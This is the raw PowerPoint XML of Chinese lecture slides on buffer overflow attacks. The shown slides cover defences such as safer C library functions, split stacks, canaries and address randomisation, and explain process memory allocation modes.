              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>改进标准库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>比如改进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>语言函数库，对具有缓冲区溢出攻击隐患的系统函数如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>gets()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等进行改进，开发出更安全的封装了若干已知易受堆栈溢出攻击的库函数。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分割控制和数据堆栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>将堆栈分割为两个堆栈，一个用于存储控制信息（如返回地址），另一个用于控制其他所有数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使堆栈向高地址增长</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>使用堆栈压入数据时向高地址方向前进，那么无论缓冲区如何溢出，都不可能覆盖低地址处的函数返回地址指针，也就避免了缓冲区溢出攻击。但这种方法仍然无法防范利用堆和静态数据段的缓冲区进行溢出的攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:latin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658813" y="1367551"/>
            <a:ext cx="7772400" cy="45853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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>两类防护技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>被动防护技术：典型代表有插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>canary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>值、存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>RETADDR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>值、指针前后加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" err="1"/>
              <a:t>guardzone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>和低脂指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>主动防护技术：更换动态链接库、加密指针型数据、随机化内存地址、去堆栈布局可预测性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="507472" y="6126780"/>
            <a:ext cx="8499168" cy="494847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273564" y="221505"/>
            <a:ext cx="6407150" cy="836613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2306853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3564" y="221505"/>
            <a:ext cx="6407150" cy="836613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515784" y="1285487"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="28575" y="2516576"/>
            <a:ext cx="9086850" cy="3190875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322416" y="1433316"/>
            <a:ext cx="8499168" cy="494847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32172733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表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005011" y="1014866"/>
            <a:ext cx="5133975" cy="5591175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273564" y="221505"/>
            <a:ext cx="6407150" cy="836613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="435137"/>
            <a:ext cx="8499168" cy="494847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21276154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539595" y="1198983"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404811" y="1713681"/>
            <a:ext cx="8499168" cy="494847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404810" y="2723226"/>
            <a:ext cx="8334375" cy="3009604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273564" y="221505"/>
            <a:ext cx="6407150" cy="836613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23957282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322414" y="6225111"/>
            <a:ext cx="8499168" cy="494847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037446" y="1235843"/>
            <a:ext cx="6912236" cy="4983089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="3366FF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273564" y="221505"/>
            <a:ext cx="6407150" cy="836613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5718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zh-CN" altLang="en-US" sz="3600"/>
              <a:t>三种内存分配模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643573" y="1340802"/>
            <a:ext cx="7772400" cy="4724717"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>静态分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：在进程创建时由系统一次性分配的整块静态内存，这块空间在进程运行期间保持不变。包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正文（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）段：指令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）段：初始化的全局静态数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段：未初始化的全局数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈空间</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zh-CN" altLang="en-US" sz="3600"/>
              <a:t>三种内存分配模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569424" y="1451585"/>
            <a:ext cx="8134960" cy="4760913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Stack)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>：调用程序的地址信息，函数参数的内存分配。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>整个堆栈空间已在进程创建时分配好。进程刚启动时，堆栈空间是空的，里面无实体。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在进程运行期间，对实体的堆栈分配是进程自行生成（压栈）和释放（弹出）实体，系统并不参与。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只要压入的实体的总长度不超过堆栈空间大小，堆栈分配就与系统无关。若超过，就会引发堆栈溢出错误。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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800" b="1"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16223</TotalTime>
  <Words>4825</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>554</Paragraphs>
  <Slides>77</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77</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="88" baseType="lpstr">
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>新宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Blends</vt:lpstr>
      <vt:lpstr>第 十 章    缓冲区溢出攻击</vt:lpstr>
      <vt:lpstr>内容提要</vt:lpstr>
      <vt:lpstr>概念</vt:lpstr>
      <vt:lpstr>缓冲区溢出的根源</vt:lpstr>
      <vt:lpstr>危害性和普遍性</vt:lpstr>
      <vt:lpstr>危害性和普遍性</vt:lpstr>
      <vt:lpstr>内容提要</vt:lpstr>
      <vt:lpstr>三种内存分配模式（1）</vt:lpstr>
      <vt:lpstr>三种内存分配模式（2）</vt:lpstr>
      <vt:lpstr>三种内存分配模式（3）</vt:lpstr>
      <vt:lpstr>三种内存分配模式比较</vt:lpstr>
      <vt:lpstr>进程内存布局</vt:lpstr>
      <vt:lpstr>进程内存布局</vt:lpstr>
